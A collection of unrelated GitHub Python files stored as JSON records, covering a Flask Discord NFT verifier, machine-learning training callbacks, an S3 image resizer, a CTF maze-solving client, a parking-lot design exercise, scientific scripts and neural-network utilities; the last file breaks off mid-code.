{"seq_id":"40311241070","text":"from flask import Flask, render_template, request\nfrom discordmanager import Discord\nfrom web3manager import Web3Manager\nfrom config import DiscordConfig, WebConfig, Web3Config\n\napp = Flask(__name__, template_folder=\"template\", static_folder=\"static\")\ndiscord = Discord(DiscordConfig)\nweb3_manager = Web3Manager(Web3Config)\n\n\n@app.route('/')\ndef index():\n code = request.args.get('code')\n token_json = discord.get_token(code, WebConfig.REDIRECT_URI) # access token\n user_json = discord.get_user_data(token_json['access_token'])\n return render_template('index.html', discordId=user_json['id'])\n\n\n@app.route('/verify', methods=['POST'])\ndef verify_post():\n # Get the Discord ID, signature, and wallet address from the POST request\n discord_id = request.form.get('discordid')\n signature = request.form.get('signature')\n wallet_address = request.form.get('wallet')\n message = request.form.get('message')\n print(f\"discord_id : {discord_id}\")\n print(f\"signature : {signature}\")\n print(f\"wallet_address : {wallet_address}\")\n print(f\"message : {message}\")\n # # Check the Discord ID and signature; store the verification info once the signature check succeeds\n\n # Perform signature verification\n is_verified = web3_manager.verify_signature(message, signature, wallet_address)\n if not is_verified:\n return 'Signature verification failed', 400\n\n is_holder = web3_manager.check_holder(wallet_address)\n if not is_holder:\n return 'You are not an NFT holder', 400\n\n # On successful verification, have the Discord bot grant the user a role\n discord.add_role(discord_id)\n return 'Verification success', 200\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000, threaded=True)","repo_name":"choisangh/flask-discord-nft-verifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"37897235175","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nERROR_REQUIRED = 'required'\nERROR_INVALID = 'invalid'\nERROR_FORBIDDEN = 'forbidden'\nNOT_FOUND = 'not_found'\n\n# JWT\nPERSON_ACCESS = 'person_access'\nPERSON_REFRESH = 'person_refresh'\nREFRESH_COOKIE_NAME = 
'flask_app__person_refresh'\n","repo_name":"Kelvedler/flask_app","sub_path":"src/app_core/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41381834209","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : utils/train_callbacks.py\n# Author : Hai-Yong Jiang \n# Date : 19.08.2018\n# Last Modified Date: 10.05.2019\n# Last Modified By : Hai-Yong Jiang \n\n\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : nn/train_callbacks.py\n# Author : Hai-Yong Jiang \n# Date : 15.05.2018\n# Last Modified Date: 11.08.2018\n# Last Modified By : Hai-Yong Jiang \nimport os\nimport torch\nimport tensorflow as tf\nfrom tensorboardX import SummaryWriter\n\nclass Callback:\n def __call__(self, *args, **kwargs):\n raise NotImplementedError\n\n def add_dict(self, writer, val_dict, prefix, epoch_id, val_type=\"scalar\"):\n for k,v in val_dict.items():\n if val_type==\"scalar\":\n writer.add_scalar(prefix+\"/\"+k, v, epoch_id)\n elif val_type==\"hist\":\n writer.add_histogram(prefix+\"/\"+k, v, epoch_id)\n\n\nclass TensorboardLoggerCallback(Callback):\n def __init__(self, cfg):\n \"\"\"\n Callback intended to be executed at each epoch\n of the training which goal is to add valuable\n information to the tensorboard logs such as the losses\n and accuracies\n Args:\n path_to_files (str): The path where to store the log files\n \"\"\"\n self.path_to_files = cfg.DATA.RES_LOG_PATH\n self.path_to_model = cfg.DATA.RES_MODEL_PATH\n self.save_best = cfg.OPTM.SAVE_BEST\n self.loss = 1e10\n\n def __call__(self, *args, **kwargs):\n if kwargs['step_name'] != \"epoch\":\n return\n\n epoch_id = kwargs['epoch_id']\n\n ## add loss for tensorboard visualization\n self.writer = SummaryWriter(self.path_to_files)\n for name in [\"train_loss\", \"val_loss\"]:\n self.add_dict(self.writer, kwargs[name],\n 'data/%s'%(name), epoch_id)\n self.add_dict(self.writer, {\"lr\": kwargs['lr']}, 'data/learning_rate', epoch_id)\n lr = kwargs['lr']\n\n if \"train_sample\" in kwargs and epoch_id>0:\n sample = kwargs[\"train_sample\"]\n for k in sample:\n if k.endswith(\"weight\"):\n if \"param_\" in k:\n self.add_dict(self.writer, {k:lr*sample[k]}, 'param/', epoch_id, \"hist\")\n if \"update_\" in k:\n self.add_dict(self.writer, {k:lr*sample[k]}, 'update/', epoch_id, \"hist\")\n\n self.writer.close()\n\n\ndef saver_keep_last_k(filename_ref, k):\n folder = os.path.dirname(filename_ref)\n filename = os.path.basename(filename_ref)\n basename, ext = os.path.splitext(filename)\n filelist = []\n for f in os.listdir(folder):\n if f.startswith(basename) and f.endswith(ext) and f!=filename:\n filelist.append(f)\n filelist = sorted(filelist)[:-k]\n for f in filelist:\n f = folder + \"/\" + f\n if os.path.exists(f):\n os.remove(f)\n else:\n print(\"Path does not exist: \" + f)\n\n\nclass ModelSaverCallback(Callback):\n def __init__(self, cfg, save_best=False, verbose=False):\n \"\"\"\n Callback intended to be executed each time a whole train pass\n get finished. 
This callback saves the model in the given path\n Args:\n verbose (bool): True or False to make the callback verbose\n path_to_model (str): The path where to store the model\n \"\"\"\n self.verbose = verbose\n self.path_to_model = cfg.DATA.RES_MODEL_PATH\n self.save_best = save_best\n self.suffix = \"\"\n\n def set_suffix(self, suffix):\n \"\"\"\n\n Args:\n suffix (str): The suffix to append to the model file name\n \"\"\"\n self.suffix = suffix\n\n def __call__(self, *args, **kwargs):\n if kwargs['step_name'] not in [\"train\", \"epoch\"]:\n return\n\n pth = self.path_to_model + self.suffix\n net = kwargs['net']\n torch.save(net.state_dict(), pth)\n\n if self.verbose:\n tf.logging.info(\"Model saved in {}\".format(pth))\n\n\nclass TrainSaverCallback:\n def __init__(self, cfg, max_save=5):\n self.log_interval = cfg.OPTM.IMG_LOG_INTERVAL\n self.cfg = cfg\n self.root_path = cfg.DATA.RES_IMG_PATH\n\n def __call__(self, *args, **kwargs):\n \"\"\" Save Input/Target/Predict/Diff, Corner/Line/Poly_maps \"\"\"\n if kwargs['step_name'] != \"epoch\":\n return\n epoch = 0\n if 'epoch_id' in kwargs:\n epoch = kwargs['epoch_id']\n\n if epoch%self.log_interval!= 0:\n return\n\n ## save the meshes\n for split in [\"train\", \"val\"]:\n if len(kwargs[split + \"_sample\"]) == 0:\n continue\n sample = kwargs[split + \"_sample\"]\n\n ## TODO: custom your data logger\n\n","repo_name":"HaiyongJiang/NNProjectTemplate","sub_path":"utils/train_callbacks.py","file_name":"train_callbacks.py","file_ext":"py","file_size_in_byte":4995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27719851454","text":"\n# Get the payload into payload variable\nimport json\nimport sys\nfrom os import environ\npayload_file = None\npayload = None\nfor i in range(len(sys.argv)):\n if sys.argv[i] == '-payload' and (i + 1) < len(sys.argv):\n payload_file = sys.argv[i+1]\n with open(payload_file, 'r') as f:\n payload = json.loads(f.read())\n break\n\n# Open S3 connection\nfrom boto.s3.connection import S3Connection\nAWS_ACCESS_KEY_ID = environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = environ.get('AWS_SECRET_ACCESS_KEY', '')\nconn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)\nbucket = conn.get_bucket('makeymedia')\n\n# Create file names\nimport uuid\nfrom datetime import datetime\nyear = datetime.now().year\nmonth = datetime.now().month\nrandom_file_name = str(uuid.uuid4())\nfolder_location = \"/\" + str(year) + \"/\" + str(month) + \"/\"\nsmall_file_location = folder_location + random_file_name + \"_small.png\"\nlarge_file_location = folder_location + random_file_name + \"_large.png\"\nfull_file_location = folder_location + random_file_name + \"_full.png\"\n\n# Open image from the given url\nimport cStringIO\nimport urllib\nfrom PIL import Image as Im\nimg_url = payload['image_url']\n# img_url = \"http://www.adafruit.com/images/1200x900/998-00.jpg\"\nimg_string = cStringIO.StringIO(urllib.urlopen(img_url).read())\nimg = Im.open(img_string)\nprint('Image opened - %s' % img_url)\n\n# Save full image to S3\nkey = bucket.new_key(full_file_location)\nkey.set_contents_from_string(img_string.getvalue())\nprint('Full image saved - %s' % full_file_location)\n\n# Resize and Save large image to S3\nimg.thumbnail((640, 428), Im.ANTIALIAS)\nout_img_large = cStringIO.StringIO()\nimg.save(out_img_large, 'PNG')\nkey = bucket.new_key(large_file_location)\nkey.set_contents_from_string(out_img_large.getvalue())\nprint('Large image saved - %s' % large_file_location)\n\n# Resize and 
Save small image to S3\nimg.thumbnail((240, 240), Im.ANTIALIAS)\nout_img_small = cStringIO.StringIO()\nimg.save(out_img_small, 'PNG')\nkey = bucket.new_key(small_file_location)\nkey.set_contents_from_string(out_img_small.getvalue())\nprint('Small image saved - %s' % small_file_location)\n\n# Send updated data to makeystreet\nimport urllib2\ns3_prefix = \"http://makeymedia.s3.amazonaws.com\"\nvalues = {\n 'image_id': payload['image_id'],\n 'small_url': s3_prefix + small_file_location,\n 'large_url': s3_prefix + large_file_location,\n 'full_url': s3_prefix + full_file_location,\n}\nget_data = urllib.urlencode(values)\nurl = \"http://makeystreet-prod.elasticbeanstalk.com/image/update/?%s\" % get_data\nprint('Request Payload: %s' % get_data)\nprint('Request URL: %s' % url)\nresponse = urllib2.urlopen(url)\nprint('Response Code: %d' % response.code)\nprint('Response Text: %s' % response.read())\n","repo_name":"Makeystreet/makeystreet","sub_path":"woot/apps/catalog/iron_workers/resize_image.py","file_name":"resize_image.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40287488415","text":"import time\nimport csv\n\ndef report(ob):\n #Create log file\n log_file_report = ob.file_destination + \"/\" + \"Parameters_Results.log\"\n log_report = file(log_file_report, 'a' )\n\n #Print parameters\n #Batch or single file\n log_report.write(\"\\nRun type: %s\" % ob.runtype)\n if ob.runtype in [\"file\",\"pictures\"]:\n log_report.write(\"\\nInput file path: %s\" % ob.inDEST)\n \n else:\n log_report.write(\"\\nInput file path: %s\" % ob.batchpool)\n log_report.write(\"\\nOutput dir: %s\" % ob.fileD)\n log_report.write(\"\\nAdapt accAvg? %s\" % ob.adapt)\n \n if ob.adapt:\n log_report.write(\"\\nExpected hitrate: %s\" % ob.frameHIT)\n log_report.write(\"\\nMinimum accAvg: %s\" % ob.floorvalue)\n log_report.write(\"\\nThreshold %s\" % ob.threshT)\n log_report.write(\"\\nMinimum contour area: %s\" % ob.minSIZE)\n log_report.write(\"\\nBurnin: %s\" % ob.burnin)\n log_report.write(\"\\nScan frames: %s\" % ob.scan)\n \n if ob.frameSET:\n log_report.write(\"\\nManual framerate: %s\" % ob.frame_rate)\n log_report.write(\"\\nSet ROI: %s\" % ob.ROI_include)\n log_report.write(\"\\nArea counter?: %s\" % ob.set_areacounter)\n log_report.write(\"\\nOutput type?: %s\\n\\n\" % ob.makeVID)\n\n #Ending time\n end=time.time()\n\n #total_time()\n total_min=(end-ob.start)/60\n\n #processed frames per second\n pfps=float(ob.frame_count)/(total_min*60)\n\n ##Write to log file\n log_report.write(\"Total run time (min): %.2f \\n \" % total_min)\n log_report.write(\"Average frames per second: %.2f \\n \" % pfps)\n\n #End of program, report some statistic to screen and log\n #log\n log_report.write(\"\\n Thank you for using MotionMeerkat! \\n\")\n log_report.write(\"Candidate motion events: %.0f \\n \" % ob.total_count )\n log_report.write(\"Frames skipped due to Threshold: %.0f \\n \" % ob.nocountr)\n log_report.write(\"Frames skipped due to minSIZE: %.0f \\n \" % ob.toosmall)\n log_report.write(\"Total frames in files: %.0f \\n \" % ob.frame_count)\n rate=float(ob.total_count)/ob.frame_count*100\n log_report.write(\"Hitrate: %.2f %% \\n\" % rate)\n log_report.write(\"Exiting\")\n\n #print to screen\n print(\"\\n\\nThank you for using MotionMeerkat! 
\n")\n    print("Total run time (min): %.2f \\n " % total_min)\n    print("Average frames processed per second: %.2f \\n " % pfps) \n    print("Candidate motion events: %.0f \\n " % ob.total_count )\n    print("Frames skipped due to AccAvg: %.0f \\n " % ob.nodiff)\n    print("Frames skipped due to Threshold: %.0f \\n " % ob.nocountr)\n    print("Frames skipped due to minSIZE: %.0f \\n " % ob.toosmall)\n    print("Total frames in files: %.0f \\n " % ob.frame_count)\n\n    rate=float(ob.total_count)/ob.frame_count*100\n    print("Hitrate: %.2f %% \\n" % rate)\n\n    #reset frame count if in batch loop\n    ob.frame_count=0\n    ob.total_count=0\n    ob.toosmall=0\n    ob.nocountr=0\n    \n    #Write csv of time stamps and frame counts\n    #file name\n    time_stamp_report = ob.file_destination + "/" + "Frames.csv"\n\n    with open(time_stamp_report, 'wb') as f:\n        writer = csv.writer(f)\n        writer.writerows(ob.stamp)\n    if ob.set_areacounter:\n        area_report = ob.file_destination + "/" + "AreaCounter.csv"\n        with open(area_report, 'wb') as f:\n            writer = csv.writer(f)\n            writer.writerows(ob.areaC)","repo_name":"bw4sz/MotionMeerkat_Bisque","sub_path":"MotionMeerkat/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17141343018","text":"from random import randint\r\n\r\nanswer = randint(1, 10)\r\nwhile True:\r\n    print(answer)\r\n    guess=int(input('enter a no 1-10 '))\r\n    if 0< guess <11:\r\n        if guess == answer:\r\n            print ('corrent choice')\r\n            break\r\n        \r\n    else:\r\n        print('whong choice')\r\n","repo_name":"Shubhsingh007/python-programs","sub_path":"PYTHON Programs/problem1_2.py","file_name":"problem1_2.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35632701717","text":"from Design_patterns.parkingLot.commands.command_executor import CommandExecutor\n\n\nclass StatusCommandExecutor(CommandExecutor):\n    COMMAND_NAME = \"status\"\n\n    def __init__(self, parking_lot_service, output_printer):\n        super().__init__(parking_lot_service, output_printer)\n\n    def validate(self, command):\n        return not command.params\n\n    def execute(self, command):\n        occupied_slots = self.parking_lot_service.get_occupied_slots()\n\n        if not occupied_slots:\n            self.output_printer.parking_lot_empty()\n            return\n\n        self.output_printer.status_header()\n        for slot in occupied_slots:\n            parked_car = slot.parked_car\n            slot_number = str(slot.slot_number)\n\n            self.output_printer.print_with_new_line(\n                self.pad_string(slot_number, 12) + self.pad_string(parked_car.registration_number, 19) + parked_car.color\n            )\n\n    @staticmethod\n    def pad_string(word, length):\n        new_word = word\n        while len(new_word) < length:\n            new_word += \" \"\n        return new_word\n","repo_name":"jameeluddin/Low-level-Design","sub_path":"Design_patterns/parkingLot/commands/StatusCommandExecutor.py","file_name":"StatusCommandExecutor.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32211344516","text":"import csv\n\n\ndef aggs_list_to_csv(aggs_list, csv_file):\n    # csv header\n    fieldnames = ['time', 'open', 'close', 'high', 'low', 'volume']\n\n    # csv data\n    rows = list(map(lambda agg_i: agg_i.to_csv_map(), aggs_list))\n\n    write_to_csv_file(csv_file, fieldnames, rows)\n\n\ndef create_EPS_announcements_to_price_change_csv(result_map, csv_file):\n    fieldnames = ['reported_date', 'surprise_percentage', 'surprise', 'estimated_EPS', 'reported_EPS',\n                  'fiscal_date_ending', 'percentage_change']\n    # csv data\n    rows = []\n    for key in result_map.keys():\n        csv_map = result_map[key][0].to_csv_map()\n        csv_map['percentage_change'] = str(result_map[key][1])\n        rows.append(csv_map)\n    write_to_csv_file(csv_file, fieldnames, rows)\n\n\ndef write_to_csv_file(csv_file, field_names, rows):\n    with open(csv_file, 'w+', encoding='UTF8', newline='') as f:\n        writer = csv.DictWriter(f, fieldnames=field_names)\n        writer.writeheader()\n        writer.writerows(rows)\n\n","repo_name":"Husamm/finance_data","sub_path":"generate_report.py","file_name":"generate_report.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28216697095","text":"# Code for aMAZEing - programming challenge from HackCon'18\n# https://hackcon.in\n# by Lorenzo Leonardini - Team ZenHack\n#\n#\n#\n# We intercepted some weird transmission. Can you find what they are hiding?! \n# nc 139.59.30.165 9300\n\nfrom __future__ import print_function\nfrom pwn import *\nfrom PIL import Image\nimport numpy\nimport maze as solver\nimport sys\n\nsys.setrecursionlimit(10000000)\n\nconn = remote('139.59.30.165', 9300)\nwhile True:\n    line = conn.recvline(timeout=4)\n    if('Enter)' in line):\n        conn.recvline()\n        break\n    # print(line.replace('\\n', ''))\nconn.send('\\n')\n\nwhile True:\n    ff = open('image.png', 'w+')\n    while True:\n        f = conn.recvline(timeout=4)\n        # print(f)\n        ff.write(bytearray(f))\n        if 'Give us the path or write INVALID' in f:\n            break;\n    ff.close()\n\n\n    im = Image.open('image.png')\n    im = im.resize((im.width / 10, im.height / 10), Image.NEAREST)\n    im.save('resized.png')\n    im_arr = numpy.array(im)\n    im.close()\n    # print(im_arr)\n\n    maze = []\n    ll = ''\n    for i in range(0, im.height + 2):\n        ll += '#'\n    maze.append(ll)\n    for line in im_arr:\n        l = '#'\n        for pixel in line:\n            if pixel[0] == 0:\n                l += '#'\n            else:\n                l += ' '\n        l += '#'\n        maze.append(l)\n    maze.append(ll)\n    maze[1] = '#S' + maze[1][2:]\n    maze[im.height] = maze[im.height][:-2] + 'E#'\n\n    # maze_file = open('maze.txt', 'w+')\n    # for i in maze:\n    #     for j in i:\n    #         maze_file.write(j)\n    #     maze_file.write('\\n')\n    # maze_file.close()\n\n    maze_obj = solver.Maze()\n    maze_obj.read_personal(maze)\n    solution = solver.solve(maze_obj)\n    if solution:\n        # print(\"\\n\\tI HAVE THE SOLUTION!\\n\")\n        # maze_obj.write_file('solution.txt')\n        conn.send(maze_obj.return_solution() + '\\n')\n    else:\n        # print(\"\\n\\tI DON'T HAVE THE SOLUTION!\\n\")\n        conn.send('INVALID\\n')\n\n    while conn.can_recv(timeout=4):\n        readed = conn.recvline(timeout=4)\n        # print(readed)\n        if 'WooHoo you got it correct. Now solve a few more and get your flag.' 
in readed:\n break\n\n finished = False\n\n while True:\n readed = conn.recvline(timeout=4)\n if 'PNG' in readed:\n conn.unrecv(readed)\n break\n elif 'Congratulations' in readed:\n print(readed, end='')\n finished = True\n break\n\n if finished:\n break\n","repo_name":"LorenzoLeonardini/CTF-Solves","sub_path":"HackCon2018/aMAZEing/aMAZEing.py","file_name":"aMAZEing.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21521628727","text":"#!/usr/bin/env python\nimport numpy as np\nimport crust1 \nimport cartopy.feature as cfeature\nimport cartopy as cart\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as ml\nfrom scipy.interpolate import griddata\nfrom obspy.clients.fdsn import Client\nfrom obspy.core import UTCDateTime\nmodel = crust1.crustModel()\n\nimport matplotlib as mpl\nmpl.rc('font', family='serif')\nmpl.rc('font', serif='Times')\n#mpl.rc('text', usetex=True)\nmpl.rc('font', size=14)\n\n\n\ndef get_upo(lat, lon, depths):\n model_result = model.get_point(lat, lon)\n cvp, cvs, crho = [],[],[]\n for depth in depths:\n mdepth = 0.\n for layer in model_result:\n if layer == 'water':\n continue\n mdepth += model_result[layer][3]*1000.\n if mdepth >= depth:\n cvp.append(model_result[layer][0]*1000)\n cvs.append(model_result[layer][1]*1000)\n crho.append(model_result[layer][2]*1000)\n break\n cvp = np.array(cvp)\n cvs = np.array(cvs)\n crho = np.array(crho)\n return cvp, cvs, crho\n\n\n\ndepths = np.linspace(0,10000., 1000)\nfig = plt.figure(1, figsize=(12,9))\nzrats, upos, zcorrs =[],[], []\nrrats, wpos, rcorrs = [], [], []\nzratsb, uposb, zcorrsb =[],[],[]\nf = open('Theresults')\nfor line in f:\n line = line.split(', ')\n lat, lon = float(line[1]), float(line[2])\n rcorr = float(line[3])\n rrat = float(line[4])*10**9\n zcorr = float(line[5])\n zrat = float(line[6])*10**9\n vp, vs, rho = get_upo(lat, lon, depths)\n try:\n vp = np.mean(vp[depths <= 3500.])\n vs = np.mean(vs[depths <= 3500.])\n rho =np.mean(rho[depths <= 3500.])\n except:\n continue\n mu = rho*vs**2\n lam = rho*vp**2 - 2*mu\n # eqn 23 of sorrells\n c0=340.\n # # return in units of nm/s/Pa\n #upo = (c0/(2*(lam+mu)))*10**9\n upo = c0*(lam + 2*mu)/(2*mu*(lam+mu))*10**9\n print(line[0])\n mval = upo\n #mval = np.mean(upo[depths <= 7500.])\n upo = mval\n\n\n if upo >= 20:\n upo=20.\n #if zrat >=30:\n # zrat = 30.\n #if wpo > 100:\n # wpo=100.\n if rrat >=100:\n rrat = 100.\n if zrat >= 20:\n zrat = 20.\n #continue\n\n #if zrat > 20:\n if zcorr >= 0.8:\n print(line[0] + ' ' + str(zrat) + ' ' + str(upo))\n\n if (zcorr >= 0.8) and (upo < 20.):\n zrats.append(zrat)\n upos.append(upo)\n zcorrs.append(zcorr)\n else:\n zratsb.append(zrat)\n uposb.append(upo)\n zcorrsb.append(zcorr)\n if rcorr >= 0.8:\n rrats.append(rrat)\n rcorrs.append(rcorr)\n # wpos.append(wpo)\n\npzv = np.polyfit(upos, zrats,1)\nprint(pzv)\npz = np.poly1d(pzv)\n#prv= np.polyfit(wpos, rrats,1)\n#pr = np.poly1d(prv)\n#plt.subplot(1,2,1)\nec=plt.scatter(upos, zrats, c=zcorrs, marker='o', vmin=0, vmax=1., label='Used in Fit')\nplt.scatter(uposb, zratsb, c=zcorrsb, marker='s', vmin=0, vmax=1., alpha=0.5, label='Not Used in Fit')\nplt.plot(np.linspace(0,90,100), pz(np.linspace(0,90,100)), color='r', label= 'Slope=' + str(round(pzv[0],3)) )\n\nplt.plot(np.linspace(0,90,100),np.linspace(0,90,100), label= 'Slope=1', color='k')\nplt.xlabel('Vertical Ratio Crust 1.0 (nm/s/Pa)')\nplt.ylabel('Vertical Ratio Hunga Tonga 
(nm/s/Pa)')\nplt.xlim((0.,21.))\nplt.ylim(0.,21.)\nplt.legend(loc='lower right', ncol=2)\ncbar = plt.colorbar(ec)\ncbar.set_label('Correlation Vertial to Hilbert Transform of Pressure')\n# plt.subplot(1,2,2)\n# plt.scatter(wpos, rrats, c=rcorrs)\n# plt.plot(np.linspace(0,30,100), pr(np.linspace(0,30,100)), color='r')\n# plt.xlabel('Radial Ratio Crust 1.0 (nm/s/Pa)')\n# plt.ylabel('Radial Ratio Hunga Tonga (nm/s/Pa)')\n# plt.xlim((0.,100.))\n# plt.ylim(0.,100.)\n# #plt.tight_layout()\nplt.savefig('Figure6.png', format='PNG', dpi=400)\nplt.savefig('Figure6.pdf', format='PDF', dpi=400)\nf.close()\n\n","repo_name":"aringler-usgs/Tonga_SA","sub_path":"figure6.py","file_name":"figure6.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22736416632","text":"# Special quantity for ion thermal energy\n\n\nimport scipy.constants\nfrom . FluidQuantity import FluidQuantity\nfrom . IonSpeciesFluidQuantity import IonSpeciesFluidQuantity\n\n\nclass IonThermalEnergy(IonSpeciesFluidQuantity):\n \n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor.\n \"\"\"\n super().__init__(*args, **kwargs)\n\n\n def getTemperature(self, ion=None):\n \"\"\"\n Returns the temperature of the named ion species. If no\n ion name is provided, a compound ion temperature object\n is returned, containing T_i for all ions.\n \"\"\"\n ec = scipy.constants.e\n\n if ion is None:\n W_i = self.data[:]\n N_i = self.output.eqsys.N_i.data[:]\n T_i = (2/3) * (W_i/ec) / N_i\n\n return IonSpeciesFluidQuantity(name='T_i', data=T_i, grid=self.grid, output=self.output, attr=self.attr)\n else:\n W_i = self[ion][:]\n N_i = self.output.eqsys.N_i[ion][:]\n T_i = (2/3) * (W_i/ec) / N_i\n\n return FluidQuantity(name=f'Ti_{ion}', data=T_i, grid=self.grid, output=self.output, attr=self.attr)\n\n\n def plotTemperature(self, ion=None, ax=None, show=None, r=None, t=None, *args, **kwargs):\n \"\"\"\n Plot ion temperature\n \"\"\"\n T_i = self.getTemperature(ion)\n return T_i.plot(ax=ax, show=show, r=r, t=t, *args, **kwargs)\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Output/IonThermalEnergy.py","file_name":"IonThermalEnergy.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"31202255573","text":"import sys\nseq = []\nwhile True:\n num = input().split('\\n')\n seq += num\n if '0' in num:\n seq = [int(i) for i in seq]\n seq.remove(max(seq))\n print(max(seq))\n sys.exit(0)\n","repo_name":"samikhailov/coursera","sub_path":"python_osnovy_programmirovaniya/week_2/vtoroi_maksimum.py","file_name":"vtoroi_maksimum.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36575691910","text":"import spconv.pytorch as spconv\nimport torch\nimport torch.nn as nn\nfrom spconv.pytorch.modules import SparseModule\n\nimport copy\nfrom collections import OrderedDict\n\n\nclass BatchNormDim1Swap(nn.BatchNorm1d):\n \"\"\"\n Used for nn.Transformer that uses a HW x N x C rep\n \"\"\"\n\n def forward(self, x):\n \"\"\"\n x: HW x N x C\n permute to N x C x HW\n Apply BN on C\n permute back\n \"\"\"\n hw, n, c = x.shape\n x = x.permute(1, 2, 0)\n x = super(BatchNormDim1Swap, self).forward(x)\n # x: n x c x hw -> hw x n x c\n x = x.permute(2, 0, 1)\n return x\n\n\nNORM_DICT = {\n \"bn\": BatchNormDim1Swap,\n \"bn1d\": nn.BatchNorm1d,\n \"id\": 
nn.Identity,\n \"ln\": nn.LayerNorm,\n}\n\nACTIVATION_DICT = {\n \"relu\": nn.ReLU,\n \"gelu\": nn.GELU,\n}\n\nWEIGHT_INIT_DICT = {\n \"xavier_uniform\": nn.init.xavier_uniform_,\n}\n\n\ndef ln_norm(x):\n return nn.GroupNorm(1, x)\n\n\nclass GenericMLP(nn.Module):\n def __init__(\n self,\n input_dim,\n hidden_dims,\n output_dim,\n norm_fn_name=None,\n activation=\"relu\",\n use_conv=False,\n dropout=None,\n hidden_use_bias=False,\n output_use_bias=True,\n output_use_activation=False,\n output_use_norm=False,\n weight_init_name=None,\n ):\n super().__init__()\n activation = ACTIVATION_DICT[activation]\n norm = None\n if norm_fn_name is not None:\n norm = NORM_DICT[norm_fn_name]\n if norm_fn_name == \"ln\" and use_conv:\n norm = ln_norm # easier way to use LayerNorm\n\n if dropout is not None:\n if not isinstance(dropout, list):\n dropout = [dropout for _ in range(len(hidden_dims))]\n\n layers = []\n prev_dim = input_dim\n for idx, x in enumerate(hidden_dims):\n if use_conv:\n layer = nn.Conv1d(prev_dim, x, 1, bias=hidden_use_bias)\n else:\n layer = nn.Linear(prev_dim, x, bias=hidden_use_bias)\n layers.append(layer)\n if norm:\n layers.append(norm(x))\n layers.append(activation())\n if dropout is not None:\n layers.append(nn.Dropout(p=dropout[idx]))\n prev_dim = x\n if use_conv:\n layer = nn.Conv1d(prev_dim, output_dim, 1, bias=output_use_bias)\n else:\n layer = nn.Linear(prev_dim, output_dim, bias=output_use_bias)\n layers.append(layer)\n\n if output_use_norm:\n layers.append(norm(output_dim))\n\n if output_use_activation:\n layers.append(activation())\n\n self.layers = nn.Sequential(*layers)\n\n if weight_init_name is not None:\n self.do_weight_init(weight_init_name)\n\n def do_weight_init(self, weight_init_name):\n func = WEIGHT_INIT_DICT[weight_init_name]\n for (_, param) in self.named_parameters():\n if param.dim() > 1: # skips batchnorm/layernorm\n func(param)\n\n def forward(self, x, channel_last=False):\n # if transpose_swap:\n # x = x.permute(0,2,1)\n output = self.layers(x)\n\n if channel_last:\n output = output.permute(0, 2, 1)\n return output\n\n\ndef get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef unique_with_inds(x, dim=-1):\n unique, inverse = torch.unique(x, return_inverse=True, dim=dim)\n perm = torch.arange(inverse.size(dim), dtype=inverse.dtype, device=inverse.device)\n inverse, perm = inverse.flip([dim]), perm.flip([dim])\n return unique, inverse.new_empty(unique.size(dim)).scatter_(dim, inverse, perm)\n\n\nclass MLP(nn.Sequential):\n def __init__(self, in_channels, out_channels, norm_fn=None, num_layers=2):\n modules = []\n for _ in range(num_layers - 1):\n modules.append(nn.Linear(in_channels, in_channels))\n if norm_fn:\n modules.append(norm_fn(in_channels))\n modules.append(nn.ReLU())\n modules.append(nn.Linear(in_channels, out_channels))\n return super().__init__(*modules)\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n nn.init.constant_(m.bias, 0)\n nn.init.normal_(self[-1].weight, 0, 0.01)\n nn.init.constant_(self[-1].bias, 0)\n\n\n# current 1x1 conv in spconv2x has a bug. 
